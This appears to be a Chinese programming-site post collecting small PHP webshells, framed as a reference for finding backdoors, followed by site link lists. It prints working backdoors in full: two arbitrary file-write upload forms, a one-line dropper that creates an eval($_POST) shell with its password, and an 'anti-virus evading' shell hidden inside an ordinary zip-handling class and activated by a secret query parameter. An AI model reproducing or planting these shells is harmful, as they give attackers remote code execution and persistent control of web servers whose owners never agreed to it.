首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

超小PHP小马小结(方便查找后门的朋友)

Posted in PHP onMay 05, 2012

作者: spider
我也来个超小PHP小马 

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。 
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

php一句话小马的后门 
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马 
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
//解压整个压缩包 
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract 
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

用法xxx.php?zxzgcn=login

超小PHP小马小结(方便查找后门的朋友)

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
php Ajax乱码
Apr 09 PHP
谈PHP生成静态页面分析 模板+缓存+写文件
Aug 17 PHP
php smarty 二级分类代码和模版循环例子
Jun 01 PHP
php动态实现表格跨行跨列实现代码
Nov 06 PHP
一个PHP二维数组排序的函数分享
Jan 17 PHP
php检测数组长度函数sizeof与count用法
Nov 17 PHP
php 指定范围内多个随机数代码实例
Jul 18 PHP
PHP编程获取图片的主色调的方法【基于Imagick扩展】
Aug 02 PHP
php递归函数怎么用才有效
Feb 24 PHP
phpstorm 配置xdebug的示例代码
Mar 31 PHP
php解压缩zip和rar压缩包文件的方法
Jul 10 PHP
php获取微信openid方法总结
Oct 10 PHP
apache mysql php 源码编译使用方法
May 03 #PHP
几个有用的php字符串过滤,转换函数代码
May 01 #PHP
PHP 基于文件头的文件类型验证类函数
May 01 #PHP
PHP 第三节 变量介绍
Apr 28 #PHP
PHP 第二节 数据类型之转换
Apr 28 #PHP
PHP 第二节 数据类型之数组
Apr 28 #PHP
PHP 第二节 数据类型之字符串类型
Apr 28 #PHP
Mybatis-Plus(3) frozenset(1) create(1) mounted(1) el-table(1) set(1) Next.js(1) TableField(1) 脚手架(2) 子查询(1)
You might like
PHP 替换模板变量实现步骤
2009/08/24 PHP
thinkphp3.2.2前后台公用类架构问题分析
2014/11/25 PHP
PHP实现截取中文字符串不出现?号的解决方法
2016/12/29 PHP
基于jquery的inputlimiter 实现字数限制功能
2010/05/30 Javascript
从数据结构分析看:用for each...in 比 for...in 要快些
2013/04/17 Javascript
qq悬浮代码(兼容各个浏览器)
2014/01/29 Javascript
跟我学Nodejs(一)--- Node.js简介及安装开发环境
2014/05/20 NodeJs
分享15个大家都熟知的jquery小技巧
2015/12/02 Javascript
easyui validatebox验证
2016/04/29 Javascript
jQuery实现鼠标滑过图片移动特效
2016/12/08 Javascript
js实现倒计时效果(小于10补零)
2017/03/08 Javascript
微信小程序 获取二维码实例详解
2017/06/23 Javascript
jQuery自动或手动图片切换效果
2017/10/11 jQuery
Vue 父子组件的数据传递、修改和更新方法
2018/03/01 Javascript
vue写一个组件
2018/04/09 Javascript
Vue 项目分环境打包的方法示例
2018/08/03 Javascript
react 中父组件与子组件双向绑定问题
2019/05/20 Javascript
layui输入框只允许输入中文且判断长度的例子
2019/09/18 Javascript
使用nodeJS中的fs模块对文件及目录进行读写,删除,追加,等操作详解
2020/02/06 NodeJs
在antd中setFieldsValue和defaultVal的用法
2020/10/29 Javascript
[47:10]完美世界DOTA2联赛PWL S3 LBZS vs Rebirth 第二场 12.16
2020/12/18 DOTA
Python通过递归遍历出集合中所有元素的方法
2015/02/25 Python
基于Python开发chrome插件的方法分析
2018/07/07 Python
使用coverage统计python web项目代码覆盖率的方法详解
2019/08/05 Python
Django实现将views.py中的数据传递到前端html页面,并展示
2020/03/16 Python
Python3爬虫中关于Ajax分析方法的总结
2020/07/10 Python
python dict如何定义
2020/09/02 Python
python 使用tkinter+you-get实现视频下载器
2020/11/17 Python
css3类选择器之结合元素选择器和多类选择器用法
2017/03/09 HTML / CSS
菲律宾票务网站:StubHub菲律宾
2018/04/21 全球购物
俄罗斯设计师家具购物网站:The Furnish
2019/12/01 全球购物
英国家居用品和床上用品零售商:P&B Home
2020/01/16 全球购物
Super-Pharm波兰:药房和香水在一个地方
2020/08/18 全球购物
体育系毕业生求职自荐信
2014/04/16 职场文书
党员对照检查剖析材料
2014/10/13 职场文书
2016年9月份红领巾广播稿
2015/12/21 职场文书